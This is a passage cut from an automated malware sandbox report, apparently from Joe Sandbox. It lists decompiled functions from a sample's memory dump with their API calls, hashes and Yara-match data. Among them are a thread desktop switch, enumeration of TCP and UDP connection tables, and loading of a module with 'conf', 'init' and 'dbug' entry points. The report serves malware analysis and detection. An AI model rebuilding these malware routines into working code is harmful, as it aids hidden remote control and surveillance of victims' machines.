                                                            				intOrPtr _t2;
                                                            				void* _t4;
                                                            				void* _t10;
                                                            				void* _t11;
                                                            				void* _t13;
                                                            				void* _t15;
                                                            				long _t16;
                                                            
                                                            				_t11 = __ecx;
                                                            				_t16 = GetLastError();
                                                            				_t10 = 0;
                                                            				_t2 =  *0x468403c; // 0x8
                                                            				_t19 = _t2 - 0xffffffff;
                                                            				if(_t2 == 0xffffffff) {
                                                            					L2:
                                                            					_t15 = E04668535(_t11, 1, 0x364);
                                                            					_pop(_t13);
                                                            					if(_t15 != 0) {
                                                            						_t4 = E04669171(_t13, _t16, __eflags,  *0x468403c, _t15);
                                                            						__eflags = _t4;
                                                            						if(_t4 != 0) {
                                                            							E04668776(_t13, _t15, 0x468742c);
                                                            							E046684AD(_t10);
                                                            							__eflags = _t15;
                                                            							if(_t15 != 0) {
                                                            								goto L9;
                                                            							} else {
                                                            								goto L8;
                                                            							}
                                                            						} else {
                                                            							_push(_t15);
                                                            							goto L4;
                                                            						}
                                                            					} else {
                                                            						_push(_t10);
                                                            						L4:
                                                            						E046684AD();
                                                            						L8:
                                                            						SetLastError(_t16);
                                                            					}
                                                            				} else {
                                                            					_t15 = E0466911B(_t11, _t16, _t19, _t2);
                                                            					if(_t15 != 0) {
                                                            						L9:
                                                            						SetLastError(_t16);
                                                            						_t10 = _t15;
                                                            					} else {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            				return _t10;
                                                            			}

                                                            APIs
                                                            • GetLastError.KERNEL32(00000001,D355BE4E,-00000004,04661777,046684D3,D355BE4E,?,046612C5,00000001,00000001), ref: 046689B9
                                                            • _free.LIBCMT ref: 046689EE
                                                            • _free.LIBCMT ref: 04668A15
                                                            • SetLastError.KERNEL32(00000000,00000001), ref: 04668A22
                                                            • SetLastError.KERNEL32(00000000,00000001), ref: 04668A2B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 0a4c0ca73baec9cead92e48b4b45c18578c70b5d8bb4b99f814929a9b2ebb97e
                                                            • Instruction ID: f4bf2dc5ddee5518f39c246d4d087f64cda927eade205d0b2798635a735e28c0
                                                            • Opcode Fuzzy Hash: 0a4c0ca73baec9cead92e48b4b45c18578c70b5d8bb4b99f814929a9b2ebb97e
                                                            • Instruction Fuzzy Hash: FF01F936206601A793227A756C88D2B166EDFD52B9324412DFC07E3241FF39BC024565
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E046518D0(signed int __ecx, signed int* _a4) {
                                                            				signed int _t18;
                                                            				signed int _t20;
                                                            				signed int _t23;
                                                            				signed int _t26;
                                                            				struct _CRITICAL_SECTION* _t30;
                                                            
                                                            				_t18 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x1f4)) != 0) {
                                                            					_t30 = __ecx + 0x1f8;
                                                            					EnterCriticalSection(_t30);
                                                            					if( *((intOrPtr*)(_t18 + 0x1f4)) != 0) {
                                                            						_t20 =  *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x210)) + 0x68)) +  *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x210)) + 0x60));
                                                            						LeaveCriticalSection(_t30);
                                                            						 *_a4 = _t20;
                                                            						return  !_t20 >> 0x1f;
                                                            					} else {
                                                            						SetLastError(0x139f);
                                                            						LeaveCriticalSection(_t30);
                                                            						_t23 = _t18 | 0xffffffff;
                                                            						 *_a4 = _t23;
                                                            						return  !_t23 >> 0x1f;
                                                            					}
                                                            				} else {
                                                            					SetLastError(0x139f);
                                                            					_t26 = _t18 | 0xffffffff;
                                                            					 *_a4 = _t26;
                                                            					return  !_t26 >> 0x1f;
                                                            				}
                                                            			}

                                                            APIs
                                                            • SetLastError.KERNEL32(0000139F), ref: 046518E4
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04651906
                                                            • SetLastError.KERNEL32(0000139F), ref: 0465191A
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 04651921
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: 42018c7492aa35c78030131bf2b320c80d0f0861959333fc2808641f8772499a
                                                            • Instruction ID: 3e9c80675121192d1297f634a8ea07e04f496d8e310e50c9dc226b2d4b12de99
                                                            • Opcode Fuzzy Hash: 42018c7492aa35c78030131bf2b320c80d0f0861959333fc2808641f8772499a
                                                            • Instruction Fuzzy Hash: 4C01843A3416059BC3049F5AD8089D5B76EEFD1335F015226E625CB3D1DB706951C7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E04645660(struct HDESK__* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				void _v264;
                                                            				long _v268;
                                                            				signed int _t6;
                                                            				struct HDESK__* _t25;
                                                            				struct HDESK__* _t27;
                                                            				signed int _t28;
                                                            
                                                            				_t6 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t6 ^ _t28;
                                                            				_t27 = __ecx;
                                                            				_t25 = GetThreadDesktop(GetCurrentThreadId());
                                                            				if(GetUserObjectInformationW(_t27, 2,  &_v264, 0x100,  &_v268) != 0) {
                                                            					if(SetThreadDesktop(_t27) == 0) {
                                                            						goto L1;
                                                            					} else {
                                                            						CloseDesktop(_t25);
                                                            						return E04655AFE(_v8 ^ _t28);
                                                            					}
                                                            				} else {
                                                            					L1:
                                                            					return E04655AFE(_v8 ^ _t28);
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 04645677
                                                            • GetThreadDesktop.USER32(00000000,?,00000000), ref: 0464567E
                                                            • GetUserObjectInformationW.USER32(00000000,00000002,?,00000100,?,?,00000000), ref: 0464569C
                                                            • SetThreadDesktop.USER32(00000000,?,00000000), ref: 046456B9
                                                            • CloseDesktop.USER32(00000000,?,00000000), ref: 046456C4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DesktopThread$CloseCurrentInformationObjectUser
                                                            • String ID:
                                                            • API String ID: 2068333509-0
                                                            • Opcode ID: 86ed2cb8145bcc3e690e19d249403d1a52305ba5883af635dae1ed5e89c9c95a
                                                            • Instruction ID: b163c8a9c9880dd4fac8d2a7c4cb682afa284082c5cf07c8aa847f18659f8470
                                                            • Opcode Fuzzy Hash: 86ed2cb8145bcc3e690e19d249403d1a52305ba5883af635dae1ed5e89c9c95a
                                                            • Instruction Fuzzy Hash: AC01AD31741118ABEB24AF68E948AFE77ACEF45311F4000AAFC0AC2240FEA89D409690
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0463B4C0(signed char* _a4) {
                                                            				void* _t11;
                                                            				signed int _t13;
                                                            				signed int _t14;
                                                            				long _t16;
                                                            				long _t17;
                                                            				void* _t22;
                                                            				long _t23;
                                                            
                                                            				_t11 = ( *_a4 & 0x000000ff) - 0x23;
                                                            				if(_t11 == 0) {
                                                            					return SetEvent( *(_t22 + 8));
                                                            				}
                                                            				_t13 = _t11 - 2;
                                                            				if(_t13 == 0) {
                                                            					_t23 =  *0x4687adc; // 0x0
                                                            					_t14 = _t13 & 0xffffff00 |  *(_t23 + 0x20c) == 0x00000000;
                                                            					 *(_t23 + 0x20c) = _t14;
                                                            					_t7 = _t23 + 0x20e; // 0x20e
                                                            					if(_t14 != 0) {
                                                            						_t16 = GetFileAttributesW();
                                                            						if(_t16 != 0xffffffff) {
                                                            							goto L11;
                                                            						} else {
                                                            							_t17 =  *0x4687adc; // 0x0
                                                            							goto L9;
                                                            						}
                                                            					} else {
                                                            						return DeleteFileW();
                                                            					}
                                                            				} else {
                                                            					_t16 = _t13 - 1;
                                                            					if(_t16 != 0) {
                                                            						L11:
                                                            						return _t16;
                                                            					} else {
                                                            						_t16 =  *0x4687adc; // 0x0
                                                            						if( *((char*)(_t16 + 0x20c)) == 0) {
                                                            							goto L11;
                                                            						} else {
                                                            							L9:
                                                            							return CloseHandle(CreateFileW(_t17 + 0x20e, 0x40000000, 2, 0, 2, 0x80, 0));
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • DeleteFileW.KERNEL32(0000020E), ref: 0463B509
                                                            • CreateFileW.KERNEL32(-0000020E,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0463B53B
                                                            • CloseHandle.KERNEL32(00000000), ref: 0463B542
                                                            • SetEvent.KERNEL32(?), ref: 0463B54F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateDeleteEventHandle
                                                            • String ID:
                                                            • API String ID: 1798639166-0
                                                            • Opcode ID: c2450ec3c4001a5409fc42dbee717c16910a5492c874c987f38bc4e9689d7b35
                                                            • Instruction ID: 531d653ffecc14811433fc5cc36b565b34bc956f451ead44e5557fd4f9c72dd9
                                                            • Opcode Fuzzy Hash: c2450ec3c4001a5409fc42dbee717c16910a5492c874c987f38bc4e9689d7b35
                                                            • Instruction Fuzzy Hash: B201B172100384AEDB248F68E80DF953B64DB24B37F689255F1198A1C3EA29FD41CB14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

C-Code - Quality: 38%
E0463DC50(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
    void* _v8;
    intOrPtr _v12;
    void* _t8;
    int _t13;
    void* _t17;
    void* _t21;
    void* _t27;

    _v12 = __ecx;
    _t8 = E0463D570(__edi, __esi);
    _v8 = _t8;
    if(_t8 != 0) {
        _push(__esi);
        _t3 = LocalSize(_t8) + 1; // 0x1
        _t17 = LocalAlloc(0x40, _t3);
        _t27 = _v8;
        _t5 = _t17 + 1; // 0x1
        _t21 = _t5;
        *_t17 = 0x8e;
        E0465E060(_t21, _t27, _t9);
        LocalFree(_t27);
        _t13 = LocalSize(_t17);
        _push(_t21);
        _push(0x3f);
        _push(_t13);
        _push(_t17);
        E04631C60( *((intOrPtr*)(_v12 + 4)));
        return LocalFree(_t17);
    }
    return _t8;
}

Instruction addresses: 0x0463dc56, 0x0463dc59, 0x0463dc5e, 0x0463dc63, 0x0463dc66, 0x0463dc70, 0x0463dc7c, 0x0463dc7f, 0x0463dc83, 0x0463dc83, 0x0463dc86, 0x0463dc8a, 0x0463dc99, 0x0463dc9c, 0x0463dca2, 0x0463dca6, 0x0463dca8, 0x0463dca9, 0x0463dcad, 0x00000000, 0x0463dcb6, 0x0463dcba

APIs
  • Part of subcall function 0463D570: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0463D59F
  • Part of subcall function 0463D570: GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 0463D5C1
• LocalSize.KERNEL32(00000000), ref: 0463DC68
• LocalAlloc.KERNEL32(00000040,00000001), ref: 0463DC76
• LocalFree.KERNEL32(?), ref: 0463DC99
• LocalSize.KERNEL32(00000000), ref: 0463DC9C
• LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463DCB3
Memory Dump Source
• Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
Yara matches
Similarity
• API ID: Local$FreeSize$AddressAllocLibraryLoadProc
• String ID:
• API String ID: 3285080383-0
• Opcode ID: 46ca776587f5920e64b9645f7d2196035e79f28a7726b98094fb33dbcf3fb398
• Instruction ID: bafaffa186bf134c654070e0ae9f6aa772498599dea87f6244456cb5f1f3fb76
• Opcode Fuzzy Hash: 46ca776587f5920e64b9645f7d2196035e79f28a7726b98094fb33dbcf3fb398
• Instruction Fuzzy Hash: 2EF0D6B1900218BBD714ABB59C48DAB7BACDF09261F000259ED09A3281FE35AD00C7B1
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 38%
E0463DCC0(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
    void* _v8;
    intOrPtr _v12;
    void* _t8;
    int _t13;
    void* _t17;
    void* _t21;
    void* _t27;

    _v12 = __ecx;
    _t8 = E0463D980(__edi, __esi);
    _v8 = _t8;
    if(_t8 != 0) {
        _push(__esi);
        _t3 = LocalSize(_t8) + 1; // 0x1
        _t17 = LocalAlloc(0x40, _t3);
        _t27 = _v8;
        _t5 = _t17 + 1; // 0x1
        _t21 = _t5;
        *_t17 = 0x8e;
        E0465E060(_t21, _t27, _t9);
        LocalFree(_t27);
        _t13 = LocalSize(_t17);
        _push(_t21);
        _push(0x3f);
        _push(_t13);
        _push(_t17);
        E04631C60( *((intOrPtr*)(_v12 + 4)));
        return LocalFree(_t17);
    }
    return _t8;
}

Instruction addresses: 0x0463dcc6, 0x0463dcc9, 0x0463dcce, 0x0463dcd3, 0x0463dcd6, 0x0463dce0, 0x0463dcec, 0x0463dcef, 0x0463dcf3, 0x0463dcf3, 0x0463dcf6, 0x0463dcfa, 0x0463dd09, 0x0463dd0c, 0x0463dd12, 0x0463dd16, 0x0463dd18, 0x0463dd19, 0x0463dd1d, 0x00000000, 0x0463dd26, 0x0463dd2a

APIs
  • Part of subcall function 0463D980: LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0463D9BB
  • Part of subcall function 0463D980: GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 0463D9CB
• LocalSize.KERNEL32(00000000), ref: 0463DCD8
• LocalAlloc.KERNEL32(00000040,00000001), ref: 0463DCE6
• LocalFree.KERNEL32(?), ref: 0463DD09
• LocalSize.KERNEL32(00000000), ref: 0463DD0C
• LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463DD23
Memory Dump Source
• Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
Yara matches
Similarity
• API ID: Local$FreeSize$AddressAllocLibraryLoadProc
• String ID:
• API String ID: 3285080383-0
• Opcode ID: d5ed5987dc26e197da315ecf16c9f385eeee623a30b27ccab50c0d56c3b10ee3
• Instruction ID: 16116897e6dff173894283f4c28618d687de0e9190fc8a9eca7a6c7fa7d418b5
• Opcode Fuzzy Hash: d5ed5987dc26e197da315ecf16c9f385eeee623a30b27ccab50c0d56c3b10ee3
• Instruction Fuzzy Hash: D7F0A9B5900218BBD714ABB5DC49DABBBACDF09255F040259F90DA3241FE35AD00C7F1
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0466C0F1(intOrPtr* _a4) {
    intOrPtr _t6;
    intOrPtr* _t21;
    void* _t23;
    void* _t24;
    void* _t25;
    void* _t26;
    void* _t27;

    _t21 = _a4;
    if(_t21 != 0) {
        _t23 =  *_t21 -  *0x46846f0; // 0x46846e4
        if(_t23 != 0) {
            E046684AD(_t7);
        }
        _t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46846f4; // 0x46878b0
        if(_t24 != 0) {
            E046684AD(_t8);
        }
        _t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46846f8; // 0x46878b0
        if(_t25 != 0) {
            E046684AD(_t9);
        }
        _t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x4684720; // 0x46846e8
        if(_t26 != 0) {
            E046684AD(_t10);
        }
        _t6 =  *((intOrPtr*)(_t21 + 0x34));
        _t27 = _t6 -  *0x4684724; // 0x46878b4
        if(_t27 != 0) {
            return E046684AD(_t6);
        }
    }
    return _t6;
}

Instruction addresses: 0x0466c0f7, 0x0466c0fc, 0x0466c100, 0x0466c106, 0x0466c109, 0x0466c10e, 0x0466c112, 0x0466c118, 0x0466c11b, 0x0466c120, 0x0466c124, 0x0466c12a, 0x0466c12d, 0x0466c132, 0x0466c136, 0x0466c13c, 0x0466c13f, 0x0466c144, 0x0466c145, 0x0466c148, 0x0466c14e, 0x00000000, 0x0466c156, 0x0466c14e, 0x0466c159

APIs
• _free.LIBCMT ref: 0466C109
  • Part of subcall function 046684AD: HeapFree.KERNEL32(00000000,00000000,?,046612C5,00000001,00000001), ref: 046684C3
  • Part of subcall function 046684AD: GetLastError.KERNEL32(D355BE4E,?,046612C5,00000001,00000001), ref: 046684D5
• _free.LIBCMT ref: 0466C11B
• _free.LIBCMT ref: 0466C12D
• _free.LIBCMT ref: 0466C13F
• _free.LIBCMT ref: 0466C151
Memory Dump Source
• Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: aa4fe9c019873c1f787b2481c17baaef9f77e80b8d77851f0226c8fb66b597eb
• Instruction ID: 844784606de95c9b8332dcac1cfffbe1c97fe4809f6b3cd691dc0565f5a588e9
• Opcode Fuzzy Hash: aa4fe9c019873c1f787b2481c17baaef9f77e80b8d77851f0226c8fb66b597eb
• Instruction Fuzzy Hash: B1F0683270164177C610EB64F485D15B3D9EA64324754580DF99AD7600FF34FC814ED4
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0463AA50(intOrPtr* __ecx) {
    void* __esi;
    struct _CRITICAL_SECTION* _t10;
    struct _CRITICAL_SECTION* _t14;
    intOrPtr* _t18;
    struct _CRITICAL_SECTION* _t20;

    _t18 = __ecx;
    *__ecx = 0x467df78;
    if( *((intOrPtr*)(__ecx + 0x24)) == 0) {
        L6:
        _t10 = _t18 + 0x28;
        DeleteCriticalSection(_t10);
        return _t10;
    } else {
        _t20 = __ecx + 0x28;
        EnterCriticalSection(_t20);
        if( *((intOrPtr*)(_t18 + 0x24)) != 0) {
            _t16 =  *((intOrPtr*)(_t18 + 0x40));
            *((intOrPtr*)(_t18 + 0x24)) = 0;
            if( *((intOrPtr*)(_t18 + 0x40)) != 0) {
                E0464FE10(_t16, _t20);
                *((intOrPtr*)(_t18 + 0x40)) = 0;
            }
            LeaveCriticalSection(_t20);
            *((intOrPtr*)( *_t18 + 4))();
            goto L6;
        } else {
            LeaveCriticalSection(_t20);
            _t14 = _t18 + 0x28;
            DeleteCriticalSection(_t14);
            return _t14;
        }
    }
}

Instruction addresses: 0x0463aa51, 0x0463aa57, 0x0463aa5d, 0x0463aaad, 0x0463aaad, 0x0463aab1, 0x0463aab8, 0x0463aa5f, 0x0463aa60, 0x0463aa64, 0x0463aa6e, 0x0463aa84, 0x0463aa87, 0x0463aa90, 0x0463aa92, 0x0463aa97, 0x0463aa97, 0x0463aa9f, 0x0463aaa9, 0x00000000, 0x0463aa70, 0x0463aa71, 0x0463aa78, 0x0463aa7c, 0x0463aa83, 0x0463aa83, 0x0463aa6e

APIs
• RtlEnterCriticalSection.NTDLL(00000000), ref: 0463AA64
• RtlLeaveCriticalSection.NTDLL(00000000), ref: 0463AA71
• RtlDeleteCriticalSection.NTDLL(00000000), ref: 0463AA7C
• RtlLeaveCriticalSection.NTDLL(00000000), ref: 0463AA9F
• RtlDeleteCriticalSection.NTDLL(00000000), ref: 0463AAB1
Memory Dump Source
• Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$DeleteLeave$Enter
• String ID:
• API String ID: 2043033798-0
• Opcode ID: fb652d2dbc78de409c15ddaa724e0ee87c336c1f9e8ca193f4300ce525d271fb
• Instruction ID: 8c38c4db5793322b7957fce237e192522098e7caf9f00a56b4bdafd0001c4dac
• Opcode Fuzzy Hash: fb652d2dbc78de409c15ddaa724e0ee87c336c1f9e8ca193f4300ce525d271fb
• Instruction Fuzzy Hash: 4FF0F972101612EFD7189F65F90CBD9BBADFF88326F040119E50A83A44EB38F565CB94
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E04647C30(intOrPtr* __ecx) {
    void* _t11;
    int _t13;
    void* _t15;
    intOrPtr* _t19;

    _t19 = __ecx;
    *__ecx = 0x467f17c;
    InterlockedExchange(__ecx + 0xc, 0);
    WaitForSingleObject( *(_t19 + 0xe4), 0xffffffff);
    CloseHandle( *(_t19 + 0xe4));
    _t11 =  *(_t19 + 0x18);
    if(_t11 != 0) {
        CloseHandle(_t11);
    }
    E04632590(_t15, _t19 + 0x1c);
    *_t19 = 0x467e8b0;
    _t13 = CloseHandle( *(_t19 + 8));
    *_t19 = 0x467e8c0;
    return _t13;
}

Instruction addresses: 0x04647c31, 0x04647c39, 0x04647c40, 0x04647c4e, 0x04647c60, 0x04647c62, 0x04647c67, 0x04647c6a, 0x04647c6a, 0x04647c6f, 0x04647c77, 0x04647c7d, 0x04647c80, 0x04647c87

                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 04647C40
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046397AF,046878D8,046878D8,00000000), ref: 04647C4E
                                                            • CloseHandle.KERNEL32(?,?,00000000,046397AF,046878D8,046878D8,00000000), ref: 04647C60
                                                            • CloseHandle.KERNEL32(?,?,00000000,046397AF,046878D8,046878D8,00000000), ref: 04647C6A
                                                            • CloseHandle.KERNEL32(?,?,00000000,046397AF,046878D8,046878D8,00000000), ref: 04647C7D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$ExchangeInterlockedObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 1896077197-0
                                                            • Opcode ID: 7c81e4210d5f2a473fa03bd54263d8ba3c7af5503c2e7ebde7b274b86bde62cf
                                                            • Instruction ID: ba70b57879f76f708bc7898c0d5bcf7296d31402f1ac55b203fb24907bb6d909
                                                            • Opcode Fuzzy Hash: 7c81e4210d5f2a473fa03bd54263d8ba3c7af5503c2e7ebde7b274b86bde62cf
                                                            • Instruction Fuzzy Hash: 24F01C751007119FDB35AF25EC48E87BBF8EF84320B114E5EE5A6D22A0FA74B845CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0464E163
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,0464DF5B,?,00000000,?,74CB4C30), ref: 0464E16F
                                                            • WSAResetEvent.WS2_32(?,?,?,?,?,?,?,?,0464DF5B,?,00000000,?,74CB4C30), ref: 0464E1AA
                                                              • Part of subcall function 04637AC0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 04637ADE
                                                              • Part of subcall function 04637AC0: RtlEnterCriticalSection.NTDLL(?), ref: 0464FA53
                                                              • Part of subcall function 04637AC0: RtlLeaveCriticalSection.NTDLL(?), ref: 0464FA7B
                                                              • Part of subcall function 04637AC0: SetLastError.KERNEL32(0000139F,?,046383DB,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464FA87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterEnumEventEventsExceptionLeaveNetworkRaiseReset
                                                            • String ID:
                                                            • API String ID: 1862898202-3916222277
                                                            • Opcode ID: ca869208b72f136a51332e806f1ca4b3cb3635181b8cf792b86b4eef71412a64
                                                            • Instruction ID: 7857cdf2203ef9f74a36207a4c85d91fcf11c56a66c8702eec27d05a9ffa3326
                                                            • Opcode Fuzzy Hash: ca869208b72f136a51332e806f1ca4b3cb3635181b8cf792b86b4eef71412a64
                                                            • Instruction Fuzzy Hash: C841A3716007049BEB208F69D848BABBBF6BFD4314F05061DD85697790FBB6F9058B80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 70%
                                                            			E0463E420(void* __ebx, void* __ecx) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void _t25;
                                                            				struct _SECURITY_ATTRIBUTES** _t26;
                                                            				struct _SECURITY_ATTRIBUTES** _t31;
                                                            				struct _SECURITY_ATTRIBUTES** _t37;
                                                            				struct _SECURITY_ATTRIBUTES** _t45;
                                                            				intOrPtr* _t46;
                                                            				void* _t48;
                                                            				struct _SECURITY_ATTRIBUTES** _t50;
                                                            				struct _SECURITY_ATTRIBUTES** _t58;
                                                            				struct _SECURITY_ATTRIBUTES** _t59;
                                                            				void* _t60;
                                                            
                                                            				_t48 = __ebx;
                                                            				_t60 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0x24)) == 0) {
                                                            					__eflags =  *(__ecx + 0x28);
                                                            					if( *(__ecx + 0x28) != 0) {
                                                            						goto L5;
                                                            					} else {
                                                            						__eflags =  *(__ecx + 0x2c);
                                                            						if(__eflags == 0) {
                                                            							_t45 = L04655B14(__ecx, __eflags, 0x14);
                                                            							_t45[1] = 0;
                                                            							 *_t45 = 0;
                                                            							 *(_t60 + 0x2c) = _t45;
                                                            						}
                                                            						__eflags =  *(_t60 + 0x14);
                                                            						if( *(_t60 + 0x14) == 0) {
                                                            							L23:
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						} else {
                                                            							_t25 =  *_t60;
                                                            							__eflags =  *(_t25 + 0x24);
                                                            							if( *(_t25 + 0x24) <= 0) {
                                                            								goto L23;
                                                            							} else {
                                                            								_t26 =  *(_t60 + 0x2c);
                                                            								__eflags = _t26[1];
                                                            								if(_t26[1] == 0) {
                                                            									E0463E5C0(_t60);
                                                            									E0463D140( *(_t60 + 0x2c),  *(_t60 + 0x14),  *((intOrPtr*)( *_t60 + 0x24)));
                                                            									E0463E5C0(_t60);
                                                            								}
                                                            								_t50 =  *(_t60 + 0x2c);
                                                            								__eflags = _t50[1];
                                                            								if(_t50[1] == 0) {
                                                            									goto L23;
                                                            								} else {
                                                            									_t58 = E0463D260(_t50, "conf");
                                                            									__eflags = _t58;
                                                            									if(_t58 != 0) {
                                                            										_t37 = L046363D0(_t48, _t58, _t60) + 4;
                                                            										__eflags = _t37;
                                                            										 *_t58( *((intOrPtr*)(L046363D0(_t48, _t58, _t60) + 0x30)), _t37,  *((intOrPtr*)(L046363D0(_t48, _t58, _t60) + 0x28)));
                                                            									}
                                                            									_t59 = E0463D260( *(_t60 + 0x2c), "init");
                                                            									__eflags = _t59;
                                                            									if(_t59 != 0) {
                                                            										 *_t59(L046363D0(_t48, _t59, _t60));
                                                            									}
                                                            									__eflags =  *((intOrPtr*)(_t60 + 0x1c)) - 2;
                                                            									if( *((intOrPtr*)(_t60 + 0x1c)) == 2) {
                                                            										_t52 =  *(_t60 + 0x2c);
                                                            										__eflags =  *(_t60 + 0x2c);
                                                            										if( *(_t60 + 0x2c) != 0) {
                                                            											_t31 = E0463D260(_t52, "dbug");
                                                            											__eflags = _t31;
                                                            											if(_t31 != 0) {
                                                            												 *_t31(1);
                                                            											}
                                                            										}
                                                            									}
                                                            									 *((intOrPtr*)(_t60 + 0x20)) = CreateThread(0, 0,  &M0463E300, _t60, 0, 0);
                                                            									return 1;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
